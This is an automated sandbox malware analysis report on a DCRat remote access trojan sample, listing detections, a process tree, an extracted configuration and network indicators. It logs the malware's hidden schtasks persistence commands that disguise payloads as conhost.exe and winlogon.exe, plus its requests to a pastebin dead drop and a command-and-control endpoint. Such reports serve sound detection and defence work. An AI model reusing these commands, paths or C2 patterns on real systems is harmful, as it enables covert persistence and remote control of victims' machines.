Windows Analysis Report
QIKiV83Pkl.exe

Overview

General Information

Sample name: QIKiV83Pkl.exe (renamed because original name is a hash value)
Original sample name: 2c00ebc767b339c3baf6bcf3086edf51.exe
Analysis ID: 1483416
MD5: 2c00ebc767b339c3baf6bcf3086edf51
SHA1: fd1aac21bf1604a175e1d87fa174d832503e3a79
SHA256: 67e022273972cda8e1633f002043e4f03cc62bf603bfc95dd5c78af8c0cfb5d2
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Program Location with Network Connections
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QIKiV83Pkl.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\QIKiV83Pkl.exe" MD5: 2C00EBC767B339C3BAF6BCF3086EDF51)
    • wscript.exe (PID: 5392 cmdline: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • portruntime.exe (PID: 3212 cmdline: "C:\brokermonitordhcp\portruntime.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
          • schtasks.exe (PID: 6912 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6656 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 744 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3088 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1168 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3672 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1272 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3020 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1848 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1840 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1888 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2260 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2092 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4260 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2908 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7136 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4708 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6844 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4124 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3628 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 4016 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 1180 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • HuzhgkcqwYiFfxvhdfMUs.exe (PID: 6572 cmdline: "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
  • HuzhgkcqwYiFfxvhdfMUs.exe (PID: 1964 cmdline: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
  • HuzhgkcqwYiFfxvhdfMUs.exe (PID: 1532 cmdline: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
  • cleanup

Malware Configuration

{"SCRT": "{\"X\":\"(\",\"Y\":\"~\",\"B\":\">\",\"y\":\"|\",\"C\":\";\",\"v\":\"$\",\"Q\":\"@\",\"c\":\"!\",\"L\":\"*\",\"3\":\",\",\"i\":\"&\",\"M\":\"_\",\"a\":\"#\",\"o\":\".\",\"J\":\"%\",\"d\":\"<\",\"m\":\"`\",\"S\":\")\",\"e\":\"^\",\"R\":\" \",\"h\":\"-\"}", "PCRT": "{\"Z\":\">\",\"r\":\")\",\"T\":\" \",\"V\":\"*\",\"D\":\"~\",\"L\":\"^\",\"m\":\"%\",\"U\":\".\",\"b\":\"#\",\"Y\":\"-\",\"B\":\"`\",\"Q\":\"&\",\"x\":\"(\",\"1\":\"<\",\"H\":\";\",\"C\":\"$\",\"W\":\"|\",\"k\":\"!\",\"R\":\",\",\"F\":\"_\",\"0\":\"@\"}", "TAG": "", "MUTEX": "DCR_MUTEX-aA95Mrr0umnIfNKyuBZl", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "DCL": "https://pastebin.com/raw/i8wetBiv", "T": "1"}

Yara Overview

Source | Rule | Description | Author | Strings
00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe", CommandLine: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, NewProcessName: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, OriginalFileName: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe", ProcessId: 1964, ProcessName: HuzhgkcqwYiFfxvhdfMUs.exe
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\brokermonitordhcp\portruntime.exe, ProcessId: 3212, TargetFilename: C:\Users\Default\conhost.exe
Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 172.67.19.24, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\QIKiV83Pkl.exe", ParentImage: C:\Users\user\Desktop\QIKiV83Pkl.exe, ParentProcessId: 7132, ParentProcessName: QIKiV83Pkl.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" , ProcessId: 5392, ProcessName: wscript.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\brokermonitordhcp\portruntime.exe", ParentImage: C:\brokermonitordhcp\portruntime.exe, ParentProcessId: 3212, ParentProcessName: portruntime.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f, ProcessId: 6912, ProcessName: schtasks.exe
No Snort rule has matched

Timestamp: 2024-07-27T11:37:33.132074+0200
SID: 2034194
Source Port: 49706
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-27T11:37:33.969083+0200
SID: 2022930
Source Port: 443
Destination Port: 49705
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-27T11:38:12.236267+0200
SID: 2022930
Source Port: 443
Destination Port: 49711
Protocol: TCP
Classtype: A Network Trojan was detected

            AV Detection

Source: QIKiV83Pkl.exe; Avira: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\brokermonitordhcp\portruntime.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Default\conhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe; Avira: detection malicious, Label: VBS/Runner.VPG
Source: portruntime.exe.3212.5.memstrmin; Malware Configuration Extractor: DCRat {"SCRT": "{\"X\":\"(\",\"Y\":\"~\",\"B\":\">\",\"y\":\"|\",\"C\":\";\",\"v\":\"$\",\"Q\":\"@\",\"c\":\"!\",\"L\":\"*\",\"3\":\",\",\"i\":\"&\",\"M\":\"_\",\"a\":\"#\",\"o\":\".\",\"J\":\"%\",\"d\":\"<\",\"m\":\"`\",\"S\":\")\",\"e\":\"^\",\"R\":\" \",\"h\":\"-\"}", "PCRT": "{\"Z\":\">\",\"r\":\")\",\"T\":\" \",\"V\":\"*\",\"D\":\"~\",\"L\":\"^\",\"m\":\"%\",\"U\":\".\",\"b\":\"#\",\"Y\":\"-\",\"B\":\"`\",\"Q\":\"&\",\"x\":\"(\",\"1\":\"<\",\"H\":\";\",\"C\":\"$\",\"W\":\"|\",\"k\":\"!\",\"R\":\",\",\"F\":\"_\",\"0\":\"@\"}", "TAG": "", "MUTEX": "DCR_MUTEX-aA95Mrr0umnIfNKyuBZl", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "DCL": "https://pastebin.com/raw/i8wetBiv", "T": "1"}
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe; ReversingLabs: Detection: 87%
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe; Virustotal: Detection: 67%
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe; ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe; Virustotal: Detection: 67%
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe; ReversingLabs: Detection: 87%
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe; Virustotal: Detection: 67%
Source: C:\Users\Default\conhost.exe; ReversingLabs: Detection: 87%
Source: C:\Users\Default\conhost.exe; Virustotal: Detection: 67%
Source: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe; ReversingLabs: Detection: 87%
Source: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe; Virustotal: Detection: 67%
Source: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe; ReversingLabs: Detection: 87%
Source: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe; Virustotal: Detection: 67%
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe; ReversingLabs: Detection: 87%
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe; Virustotal: Detection: 67%
Source: C:\brokermonitordhcp\portruntime.exe; ReversingLabs: Detection: 87%
Source: C:\brokermonitordhcp\portruntime.exe; Virustotal: Detection: 67%
Source: QIKiV83Pkl.exe; ReversingLabs: Detection: 71%
Source: QIKiV83Pkl.exe; Virustotal: Detection: 59%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe; Joe Sandbox ML: detected
Source: C:\brokermonitordhcp\portruntime.exe; Joe Sandbox ML: detected
Source: C:\Users\Default\conhost.exe; Joe Sandbox ML: detected
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe; Joe Sandbox ML: detected
Source: QIKiV83Pkl.exe; Joe Sandbox ML: detected
Source: QIKiV83Pkl.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\brokermonitordhcp\portruntime.exe; Directory created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe; Directory created: C:\Program Files\Windows Photo Viewer\en-GB\be621495aa6c7b
Source: C:\brokermonitordhcp\portruntime.exe; Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe
Source: C:\brokermonitordhcp\portruntime.exe; Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cc11b995f2a76d
Source: unknown; HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: QIKiV83Pkl.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb; source: QIKiV83Pkl.exe
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe; Code function: 0_2_0087A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe; Code function: 0_2_0088B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe; Code function: 0_2_0089AAA8 FindFirstFileExA
Source: C:\brokermonitordhcp\portruntime.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\brokermonitordhcp\portruntime.exe; File opened: C:\Users\user
Source: C:\brokermonitordhcp\portruntime.exe; File opened: C:\Users\user\AppData\Local
Source: C:\brokermonitordhcp\portruntime.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\brokermonitordhcp\portruntime.exe; File opened: C:\Users\user\AppData
Source: C:\brokermonitordhcp\portruntime.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe; Code function: 4x nop then jmp 00007FFAAC48CCDAh (21_2_00007FFAAC48CBD9)

Networking

Source: unknown; DNS query: name: pastebin.com
Source: Joe Sandbox View; IP Address: 172.67.19.24
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /raw/i8wetBiv HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: romangw5.beget.tech | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: romangw5.beget.tech
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: pastebin.com
Source: global traffic; DNS traffic detected: DNS query: romangw5.beget.tech
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pastebin.com
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://romangw5.beget.tech
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://romangw5.beget.tech/
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f
Source: portruntime.exe, 00000005.00000002.1474905892.000000000300D000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/i8wetBiv
Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49704

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0087718C
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Windows\Downloaded Program Files\be621495aa6c7bJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087857B0_2_0087857B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008870BF0_2_008870BF
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089D00E0_2_0089D00E
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087407E0_2_0087407E
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008A11940_2_008A1194
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008732810_2_00873281
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087E2A00_2_0087E2A0
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008902F60_2_008902F6
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008866460_2_00886646
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008837C10_2_008837C1
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008727E80_2_008727E8
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089070E0_2_0089070E
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089473A0_2_0089473A
